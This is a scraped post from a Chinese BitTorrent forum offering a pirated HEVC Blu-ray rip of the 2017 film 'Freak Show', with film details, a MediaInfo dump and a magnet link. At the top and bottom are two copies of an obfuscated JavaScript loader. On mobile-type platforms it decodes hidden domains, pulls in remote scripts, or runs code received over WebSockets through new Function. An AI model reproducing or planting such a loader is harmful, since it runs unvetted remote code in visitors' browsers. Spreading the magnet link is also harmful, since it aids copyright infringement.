怪奇秀[中文字幕][email protected] 6.53GB

版主小s 19天前 143

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 怪奇秀 / 畸形秀 / 花娇男孩扮装秀(台) / 校花争霸战(港)

◎片 名 Freak Show

◎年 代 2017

◎产 地 美国

◎类 别 剧情 / 喜剧 / 同性

◎语 言 英语

◎上映日期 2017-02-13(柏林电影节) / 2018-01-12(美国)

◎IMDb链接 https://www.imdb.com/title/tt5089534/

◎豆瓣评分 7.5/10 (5005人评价)

◎豆瓣链接 https://movie.douban.com/subject/26656655/

◎片 长 91分钟

◎导 演 楚蒂·斯泰勒 Trudie Styler (id:1014117)

◎编 剧 帕特里克·J·克里夫顿 Patrick J. Clifton (id:1388385)

贝思·里戛齐奥 Beth Rigazio (id:1388386)

詹姆斯·圣詹姆斯 James St. James (id:1023295)

◎演 员 埃里克斯·劳瑟 Alex Lawther (id:1343731)

阿比盖尔·布雷斯林 Abigail Breslin (id:1025142)

安娜索菲亚·罗伯 AnnaSophia Robb (id:1183788)

拉弗恩·考克斯 Laverne Cox (id:1332182)

米奇·萨姆纳 Mickey Sumner (id:1328943)

薇拉·菲茨杰拉德 Willa Fitzgerald (id:1349048)

贝特·米德勒 Bette Midler (id:1055782)

伊恩·尼尔森 Ian Nelson (id:1332108)

西利亚·维斯顿 Celia Weston (id:1161747)

克里斯托弗·迪伦·怀特 Christopher Dylan White (id:1388387)

约翰·麦肯罗 John McEnroe (id:1118103)

迈克尔·帕克 Michael Park (id:1130277)

拉里·派恩 Larry Pine (id:1032769)

桃乐丝·麦卡锡 Doris McCarthy (id:1388388)

夏洛特·阿本 Charlotte Ubben (id:1388389)

埃迪·斯威哈特 Eddie Schweighardt (id:1388390)

迈克尔·温·古查多 Michael Wren Gucciardo (id:1388391)

奥利·哈斯基维 Olli Haaskivi (id:1388392)

布列塔尼·安妮·伍德福特 Brittany Anne Woodford (id:1384570)

丹·罗莫 Dan Romer (id:1325664)

◎标 签 同性 / 青春 / LGBT / 英国 / 校园 / 喜剧 / 剧情 / 成长

◎简 介

影片讲述男孩比利(劳瑟饰)被母亲送到父亲身边,并转了学校,但保守的新学校压制着他。比利不得不采取行动,挑战学校权威,以获得“返校节皇后”的称号。

◎获奖情况 (共2项)

第67届柏林国际电影节 (2017)

新生代青年单元 最佳影片(提名)

└──楚蒂·斯泰勒 (id:1014117)

第5届豆瓣电影年度榜单 (2018)

年度LGBT电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 257306145150923971833944435531246801062 (0xC1935C6952AF8AE5DE502E59617D10A6)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.53 GiB

  8. Duration : 1 h 30 min

  9. Overall bit rate : 10.3 Mb/s

  10. Encoded date : UTC 2021-11-12 23:43:00

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 30 min

  20. Bit rate : 8 656 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.235

  30. Stream size : 5.50 GiB (84%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=16.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 30 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 982 MiB (15%)

  52. Language : English

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4610 (0x1202)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 25 min

  64. Bit rate : 61.3 kb/s

  65. Count of elements : 1873

  66. Stream size : 37.3 MiB (1%)

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4611 (0x1203)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 25 min

  79. Bit rate : 61.7 kb/s

  80. Count of elements : 1873

  81. Stream size : 37.6 MiB (1%)

  82. Language : Chinese

  83. Default : No

  84. Forced : No

  85. Original source medium : Blu-ray


  86. Text #3

  87. ID : 5

  88. ID in the original source medium : 4612 (0x1204)

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 25 min

  94. Bit rate : 35.6 kb/s

  95. Count of elements : 1870

  96. Stream size : 21.6 MiB (0%)

  97. Language : Chinese

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #4

  102. ID : 6

  103. ID in the original source medium : 4613 (0x1205)

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 25 min

  109. Bit rate : 36.0 kb/s

  110. Count of elements : 1870

  111. Stream size : 21.9 MiB (0%)

  112. Language : Chinese

  113. Default : No

  114. Forced : No

  115. Original source medium : Blu-ray


  116. Text #5

  117. ID : 7

  118. ID in the original source medium : 4608 (0x1200)

  119. Format : PGS

  120. Muxing mode : zlib

  121. Codec ID : S_HDMV/PGS

  122. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration : 1 h 29 min

  124. Bit rate : 41.8 kb/s

  125. Count of elements : 2268

  126. Stream size : 26.6 MiB (0%)

  127. Language : English

  128. Default : No

  129. Forced : No

  130. Original source medium : Blu-ray


  131. Menu

  132. 00:00:00.000 : en:第 01 章




复制代码


TAGS 剧情 喜剧 同性

磁力链:
  • magnet:?xt=urn:btih:51807F0340BE0F8E49915B21EB148379CCE7AC86

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};